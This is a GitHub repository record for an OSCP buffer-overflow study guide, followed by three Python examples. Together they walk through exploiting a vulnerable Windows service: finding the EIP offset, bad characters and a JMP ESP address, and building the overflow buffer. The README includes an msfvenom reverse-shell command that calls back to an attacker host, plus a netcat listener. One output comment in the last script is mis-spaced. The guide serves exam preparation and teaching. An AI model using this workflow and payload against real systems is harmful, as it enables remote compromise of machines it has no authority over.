{"id":13510854,"url":"https://github.com/3isenHeiM/OSCP-BoF","last_synced_at":"2025-03-30T17:31:31.043Z","repository":{"id":48663484,"uuid":"331962513","full_name":"3isenHeiM/OSCP-BoF","owner":"3isenHeiM","description":"This is a walkthrough about understanding the #BoF machine present in the #OSCP exam.","archived":false,"fork":false,"pushed_at":"2021-07-15T08:31:07.000Z","size":49,"stargazers_count":64,"open_issues_count":0,"forks_count":30,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-30T12:22:26.909Z","etag":null,"topics":["buffer-overflow","oscp","oscp-prep","oscp-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/3isenHeiM.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-01-22T14:01:23.000Z","updated_at":"2025-03-27T07:06:28.000Z","dependencies_parsed_at":"2022-09-13T20:52:59.525Z","dependency_job_id":null,"html_url":"https://github.com/3isenHeiM/OSCP-BoF","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3isenHeiM%2FOSCP-BoF","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3isenHeiM%2FOSCP-BoF/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3isenHeiM%2FOSCP-BoF/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3isenHeiM%2FOSCP-BoF/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/3isenHeiM","download_url":"https://codeload.github.com/3isenHeiM/OSCP-BoF/tar.gz/refs/heads/master",
"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246355392,"owners_count":20763990,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["buffer-overflow","oscp","oscp-prep","oscp-tools"],"created_at":"2024-08-01T02:01:56.620Z","updated_at":"2025-03-30T17:31:31.032Z","avatar_url":"https://github.com/3isenHeiM.png","language":"Python","funding_links":[],"categories":["Python","others"],"sub_categories":[],"readme":"# Buffer Overflow methodology\n\n![GitHub Repo stars](https://img.shields.io/github/stars/3isenHeiM/OSCP-BoF?style=social) [![GitHub last commit (branch)](https://img.shields.io/github/last-commit/3isenHeiM/OSCP-BoF/master)](https://github.com/3isenHeiM/OSCP-BoF/commits) ![GitHub](https://img.shields.io/github/license/3isenHeiM/OSCP-BoF)\n\n[![Python 3](https://img.shields.io/badge/python-3-blue.svg?logo=python\u0026logoColor=white)](https://www.python.org/downloads/release/python-3/) ![GitHub Workflow Status](https://img.shields.io/github/workflow/status/3isenHeiM/OSCP-BoF/Linting)\n\n[![Twitter Follow](https://img.shields.io/twitter/follow/3isenHeiM?style=social)](https://twitter.com/3isenHeiM)\n\n## Introduction\n\nThese are 7 simple Python scripts and a methodology **to ease** (not *automate*!) the exploitation.\nEach script targets one phase of the exploitation:\n\n1. Trigger the BoF (optional for the OSCP, since the exam gives you a code snippet)\n2. Find the EIP offset\n3. Confirm the offset\n4. Find the badchars\n5. Confirm badchars + find a JMP ESP instruction\n6. Confirm code execution (pop calc)\n7. 
Exploit host\n\nIt's based on the [do stack buffer overflow good](https://github.com/justinsteven/dostackbufferoverflowgood) project (by the way, it's excellently explained).\n\n## How to use\n\nFollow each step and you'll be able to craft a working BoF exploit.\n\nAll the target-specific variables are stored in [1 single resource file](PARAMETERS.py),\nto avoid any confusion during the exam.\n\nAfter each step, fill in the proper variables with the values found; they'll be re-used by the next step.\n\nNote: if the application becomes unresponsive after a debugging run (the process is usually dead after each crash, so expect this once per step), close Immunity Debugger first, restart the \"vulnapp.exe\" application, then attach to it again in Immunity Debugger and press Run (F9).\n\n## 0. Pre-start\n\nFill in the following variables in the [resource file](PARAMETERS.py) depending on the host to attack:\n * ``RHOST``: the IP address of the host\n * ``RPORT``: the port on which the application to exploit is listening\n\n## 1. Segmentation fault : [1_segfault.py](1_segfault.py)\n\nSend a string long enough to crash the application (the debugger shows an access violation, with EIP overwritten by the filler, e.g. ``41414141`` if the filler is ``A``s).\n\nPlease note that the total length to send is often given in the example they\nprovide in the exam.\n\nNote the length that caused the crash: it is the size you will use to build the pattern in the next step. The precise EIP offset is determined in step 2 and stored in the variable ``offset_eip`` in ``PARAMETERS.py``.\n\n## 2. 
Find the offset : [2_find_offset.py](2_find_offset.py)\n\nGenerate the pattern (adapt the buffer length to the crash length found in step 1):\n\n    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l \u003cString_Length\u003e\n\n    buf += (\"\u003cPATTERN\u003e\")\n\nPut the output into the variable ``buf`` in ``2_find_offset.py`` \u0026 send it.\n\nOnce the app crashes, note down the value of the EIP register (the address of the next instruction to be executed, now overwritten by 4 bytes of the pattern).\n\nIf needed, convert the EIP value to ASCII: ``echo \"\u003cEIP_value\u003e\" | xxd -r -p``. Because x86 is little-endian, the 4 characters come out reversed compared to the pattern (EIP ``41326141`` is the pattern bytes ``Aa2A`` in memory); ``pattern_offset.rb`` takes care of this, so pass it the hex value exactly as the debugger shows it.\n\nFind the offset at which the sequence occurs in the pattern:\n\n    /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q \u003cEIP_value\u003e\n\nOr, type this in Immunity Debugger: `!mona findmsp`. It reports the EIP offset and also where the pattern lands relative to ESP.\n\nNote the value of the EIP offset in the variable ``offset_eip`` in ``PARAMETERS.py``, and the value of the ESP offset in the variable ``offset_esp``.\n\n## 3. Control the EIP : [3_confirm_offset.py](3_confirm_offset.py)\n\nExecute this script as is.\n\nIn Immunity Debugger, make sure that:\n   - **BBBB** is in EIP (in hex, so ``42424242``)\n   - **CCCCDDDDD.....** is written where ESP points (right-click ESP, *Follow in Dump*)\n\nIf EIP holds anything other than ``42424242``, the offset is wrong (or a bad char mangled the buffer before it reached EIP): go back to step 2.\n\n## 4. Find the bad chars : [4_find_badchars.py](4_find_badchars.py)\n\nSend it to the application (the sequence should contain every byte value ``\\x01``..``\\xff``; ``\\x00`` is left out from the start, as it terminates C strings).\n\nIn Immunity Debugger, have mona create the same byte array (``-cpb`` excludes the chars already known to be bad):\n\n    !mona bytearray -cpb \"\\x00\"\n\nThe console output will tell you where it has been saved (``bytearray.bin`` in mona's working folder).\n\nCompare this file with the stack contents:\n\n    !mona compare -a ESP -f \u003cfile_with_bad_chars\u003e\n    !mona compare -a \u003cWHATEVER ADDRESS\u003e -f \u003cfile_with_bad_chars\u003e\n\n**Note:** always use the full path to the file!\n\nIn the mona output, ``Possibly bad chars`` are listed.\nPut them in the ``badchars`` array in ``PARAMETERS.py``. Caveat: mona often reports the byte *following* a corrupted one as well (it is merely shifted out of place, not bad in itself); add the first reported byte, re-run the comparison, and only keep the next one if it is still reported.\n\n## 5. Confirm badchars \u0026 find a JMP ESP instruction : [5_find_jmp_esp.py](5_find_jmp_esp.py)\n\n### a. 
Confirm badchars\n\nMake sure the badchars identified are listed in the ``PARAMETERS.py`` file.\n\nExecute the script.\n\nRe-generate the byte array with mona, excluding the badchars found so far (the list below is an example):\n\n    !mona bytearray -cpb \"\\x00\\x04\\x05\\xA2\\xA3\\xAC\\xAD\\xC0\\xC1\\xEF\\xF0\"\n\nThe console output will tell you where it has been saved.\n\nCompare the ``bytearray.bin`` (**use the full filepath**) with the buffer in memory to make sure they are the same.\nThat means no new badchar has been detected:\n\n    !mona compare -a ESP -f \u003cfile_with_bad_chars\u003e\n    !mona compare -a \u003cWHATEVER ADDRESS\u003e -f \u003cfile_with_bad_chars\u003e\n\nThe mona output status should be ``Unmodified`` and you should get a message in the\nconsole saying: ``!!! Hooray, normal shellcode unmodified !!!``\n\nThis means that no other badchars have been detected. If new ones show up, add them to ``PARAMETERS.py`` and repeat until the array comes back unmodified; the final list is what you pass to ``-cpb`` below and to msfvenom's ``-b`` in the next steps.\n\n### b. Find a JMP ESP\n\nAsk mona to find a ``JMP ESP`` instruction (or an equivalent such as ``CALL ESP`` or ``PUSH ESP; RET``, which mona lists as well) that will make the processor execute\nwhatever we have put on the stack, with no badchar in its address:\n\n    !mona jmp -r esp -cpb \"\u003cbad_chars\u003e\"\n\nwhere ``\u003cbad_chars\u003e`` is formatted like this: ``\\x00\\x01``.\n\nPrefer an address from a module whose ``Rebase``, ``SafeSEH``, ``ASLR`` and ``NXCompat`` columns all read ``False`` (``!mona modules`` shows them); otherwise the address may change between runs or the stack may not be executable.\n\nPut the address returned in the variable ``ptr_jmp_esp`` in ``PARAMETERS.py``. Remember it goes into the buffer little-endian (``0x11223344`` is sent as ``\\x44\\x33\\x22\\x11``).\n\n## 6. Pop calc : [6_pop_calc.py](6_pop_calc.py)\n\nThis confirms code execution on the target host.\nIt validates the build-up of the exploit and gives you a working baseline before switching to a real payload.\n\nLaunch this to produce the shellcode that will make calc pop on the target:\n\n    msfvenom -p windows/exec -b '\u003cbadchars\u003e' -f python --var-name shellcode_calc \\\n    CMD=calc.exe EXITFUNC=thread\n\nInsert the output (python variable ``shellcode_calc``) in the script ``6_pop_calc.py``.\n\nIn the script, we also move ESP 16 bytes away from the shellcode, toward lower addresses (instruction ``SUB ESP,0x10``, bytes ``\\x83\\xEC\\x10``), before the shellcode.\nThis keeps the decoder stub prepended by the msfvenom encoder from overwriting the start of the payload: after ``JMP ESP`` the shellcode sits exactly at ESP, and the decoder writes to the area around ESP while it runs.\nSome people use a NOP sled instead; adjusting ESP is the cleaner way ;)\n\nLaunch the script and enjoy popping calc!\n\n## 7. 
Create shellcode : [7_exploit.py](7_exploit.py)\n\nNow you can craft any other shellcode as long as you respect the badchars:\n\n    msfvenom -p windows/shell_reverse_tcp LHOST=\u003cAttacker_IP\u003e LPORT=\u003cAttacker_Port\u003e \\\n    -f py -b '\u003cbadchars\u003e' -e x86/shikata_ga_nai --var-name shellcode\n\nInsert the output (python variable ``shellcode``) in the script ``7_exploit.py``, start a listener on the attacking machine (``nc -nvlp \u003cAttacker_Port\u003e``) and run the script. Adding ``EXITFUNC=thread`` to the msfvenom command, as in step 6, keeps the application alive when the shell exits.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F3isenHeiM%2FOSCP-BoF","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F3isenHeiM%2FOSCP-BoF","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F3isenHeiM%2FOSCP-BoF/lists"}
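Steps 2 and 3 of the README above, worked as an added example (this is not code from the 3isenHeiM/OSCP-BoF scripts): it re-implements what `pattern_create.rb` and `pattern_offset.rb` do, so the little-endian detail behind "convert the EIP value to ASCII" becomes visible, and it simulates the crash so the round trip pattern -> EIP value -> offset can be checked offline. The crash offsets used (6 and 2003) are constructed values, not from the page.

```python
"""Steps 2/3: cyclic pattern, EIP value -> offset, and the step-3 confirmation buffer.

Added example that mirrors pattern_create.rb / pattern_offset.rb; not code from
the OSCP-BoF repository. Offsets used below are constructed for the demo.
"""
import string
import struct
from typing import Optional

# Same alphabet and ordering as Metasploit's pattern_create.rb.
UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes before it repeats


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the non-repeating pattern Aa0Aa1Aa2...Ab0Ab1...."""
    if length > MAX_PATTERN:
        raise ValueError(f"pattern would repeat after {MAX_PATTERN} bytes")
    out = bytearray()
    for a in UPPER:
        for b in LOWER:
            for c in DIGITS:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def eip_as_seen(buf: bytes, offset: int) -> str:
    """What the debugger displays in EIP when the 4 bytes at `offset` land on the
    saved return address: the little-endian integer, printed as 8 hex digits."""
    return f"{struct.unpack('<I', buf[offset:offset + 4])[0]:08x}"


def pattern_offset(eip_hex: str, length: int = MAX_PATTERN) -> Optional[int]:
    """Map the EIP value as displayed (e.g. '41326141') back to the pattern offset.

    The register shows the four bytes as a little-endian number, so packing the
    value with '<I' recovers the bytes in memory order ('Aa2A') before searching.
    Every 4-byte window of the pattern is unique, so the first hit is the answer.
    """
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


def confirm_buffer(offset: int, tail: int = 200) -> bytes:
    """Step-3 buffer: filler up to the offset, BBBB that must show up in EIP,
    then CCCC followed by D's, which is what ESP must point to after the crash."""
    return b"A" * offset + b"BBBB" + b"CCCC" + b"D" * tail


if __name__ == "__main__":
    buf = pattern_create(600)
    seen = eip_as_seen(buf, 6)                 # simulate a crash at offset 6
    print(seen, pattern_offset(seen))          # 41326141 6
    print(eip_as_seen(confirm_buffer(6), 6))   # 42424242
```

Against a real target you only need `pattern_offset()` with the value copied from the EIP register; `eip_as_seen()` exists to show why that value looks reversed when converted to ASCII with `xxd -r -p`.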
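Steps 4 and 5a of the README above (the badchar loop with `!mona bytearray` / `!mona compare`), as an added example that is not part of the OSCP-BoF repository: it builds the same byte array mona writes, compares it with what "landed" in memory, and shows why only the first mismatch should be trusted and why the byte after a bad one gets flagged too. The vulnerable service is a constructed stand-in (`simulated_target`, truncating at NUL, dropping CR and replacing LF) so the loop runs offline; against the real application the dump comes from the debugger.

```python
"""Steps 4/5a: find bad characters by comparing what was sent with what landed at ESP.

Added example, not from the OSCP-BoF repository. The target is a constructed
function so the loop runs offline.
"""
from typing import Callable, List, Optional


def bytearray_without(excluded: bytes) -> bytes:
    """Every byte value in order, minus the ones already known bad
    (the content of the bytearray.bin written by `!mona bytearray -cpb "..."`)."""
    return bytes(b for b in range(256) if b not in excluded)


def to_cpb(bad: bytes) -> str:
    r"""Format a badchar list the way mona's -cpb and msfvenom's -b expect: \x00\x0a..."""
    return "".join(f"\\x{b:02x}" for b in bad)


def first_mismatch(sent: bytes, seen: bytes) -> Optional[int]:
    """Index of the first byte that differs between what was sent and the memory
    dump (the first thing `!mona compare` reports), or None if unmodified.

    Only the first index is trustworthy: once a byte is dropped or replaced,
    everything after it is shifted or garbage, so later mismatches say nothing.
    """
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            return i
    return None


def naive_mismatches(sent: bytes, seen: bytes) -> List[int]:
    """All differing positions; shows why the byte *after* a bad one looks bad too."""
    return [i for i, b in enumerate(sent) if i >= len(seen) or seen[i] != b]


def find_badchars(send_and_dump: Callable[[bytes], bytes],
                  known: bytes = b"\x00", max_rounds: int = 16) -> bytes:
    """Iterate steps 4 -> 5a: send the array minus known badchars, add the first
    corrupted byte, resend, until the dump comes back unmodified.

    Adding one byte per round avoids blacklisting the byte that merely follows
    a bad one; NUL is excluded from the start because it terminates C strings.
    """
    bad = bytearray(known)
    for _ in range(max_rounds):
        sent = bytearray_without(bytes(bad))
        i = first_mismatch(sent, send_and_dump(sent))
        if i is None:
            return bytes(bad)
        bad.append(sent[i])
    raise RuntimeError("badchar list did not converge; re-check the EIP offset first")


def simulated_target(data: bytes) -> bytes:
    """Constructed stand-in for the vulnerable service: treats the input as a
    C string (truncates at NUL), strips carriage returns and turns LF into a space."""
    data = data.split(b"\x00", 1)[0]
    return data.replace(b"\x0d", b"").replace(b"\x0a", b" ")


if __name__ == "__main__":
    bad = find_badchars(simulated_target)
    print(to_cpb(bad))  # \x00\x0a\x0d
```

With the constructed target, a single naive comparison after excluding only `\x00` and `\x0a` flags `\x0d` and every byte after it (the dump is shifted left by one), which is the pattern behind pairs like `\x04\x05` in the README's example list; the one-byte-per-round loop converges on `\x00\x0a\x0d` instead.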
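Steps 5b to 7 of the README above (JMP ESP address, `SUB ESP,0x10`, shellcode), as an added example that is not the repository's `6_pop_calc.py` or `7_exploit.py`: it assembles the final buffer in the layout the README describes and refuses to build one whose address or shellcode bytes would be mangled by the badchars. `PARAMS` is a placeholder for `PARAMETERS.py` with assumed values (the offset, the address `0x625011AF` and the badchar list are illustrative, not from the page); the "shellcode" is a single `INT3` (`\xcc`), which makes the debugger break at ESP and so proves control before msfvenom output is pasted in.

```python
"""Steps 5b-7: assemble the final buffer and validate it against the badchars.

Added example, not the repository's scripts. PARAMS holds assumed placeholder
values standing in for PARAMETERS.py.
"""
import socket
import struct
from typing import List

# Assumed stand-in for PARAMETERS.py (placeholder values, not from the repo or the page).
PARAMS = {
    "RHOST": "192.168.1.10",
    "RPORT": 9999,
    "offset_eip": 2003,
    "ptr_jmp_esp": 0x625011AF,
    "badchars": b"\x00\x04\x05\xA2\xA3\xAC\xAD\xC0\xC1\xEF\xF0",
}

SUB_ESP_0x10 = b"\x83\xEC\x10"   # sub esp, 0x10: keeps the decoder stub clear of the payload
INT3 = b"\xCC"                   # stand-in shellcode: breaks into the debugger right at ESP


def badchars_in(data: bytes, badchars: bytes) -> List[int]:
    """Sorted list of forbidden byte values present in `data` (empty when clean)."""
    return sorted({b for b in data if b in badchars})


def address_is_clean(ptr: int, badchars: bytes) -> bool:
    """True when the little-endian encoding of `ptr` contains no badchar."""
    return not badchars_in(struct.pack("<I", ptr), badchars)


def build_exploit(offset_eip: int, ptr_jmp_esp: int, shellcode: bytes,
                  badchars: bytes, total_len: int = 0) -> bytes:
    """filler | JMP ESP address (little-endian) | SUB ESP,0x10 | shellcode | NOP padding

    Refuses to build a buffer that would be mangled in transit: the address bytes
    and the (already encoded) shellcode must be free of badchars.
    """
    ret = struct.pack("<I", ptr_jmp_esp)
    bad = badchars_in(ret, badchars)
    if bad:
        raise ValueError(f"JMP ESP address {ptr_jmp_esp:#010x} contains badchars {bad}; pick another")
    bad = badchars_in(shellcode, badchars)
    if bad:
        raise ValueError(f"shellcode contains badchars {bad}; re-run msfvenom with -b")
    buf = b"A" * offset_eip + ret + SUB_ESP_0x10 + shellcode
    if len(buf) < total_len:                      # keep the crash length of step 1 if the app needs it
        buf += b"\x90" * (total_len - len(buf))
    return buf


def send_buffer(rhost: str, rport: int, payload: bytes, prefix: bytes = b"") -> None:
    """Deliver the buffer; `prefix` is whatever command the exam snippet sends before it."""
    with socket.create_connection((rhost, rport), timeout=5) as s:
        s.sendall(prefix + payload + b"\r\n")


if __name__ == "__main__":
    p = PARAMS
    buf = build_exploit(p["offset_eip"], p["ptr_jmp_esp"], INT3, p["badchars"])
    print(len(buf), buf[p["offset_eip"]:p["offset_eip"] + 8].hex())  # 2011 af1150628 3ec10cc
    # send_buffer(p["RHOST"], p["RPORT"], buf)   # only against the lab target
```

Swap `INT3` for the `shellcode_calc` / `shellcode` variable produced by msfvenom once the breakpoint hits; the badchar check on the encoded shellcode is cheap insurance against having run msfvenom with an incomplete `-b` list.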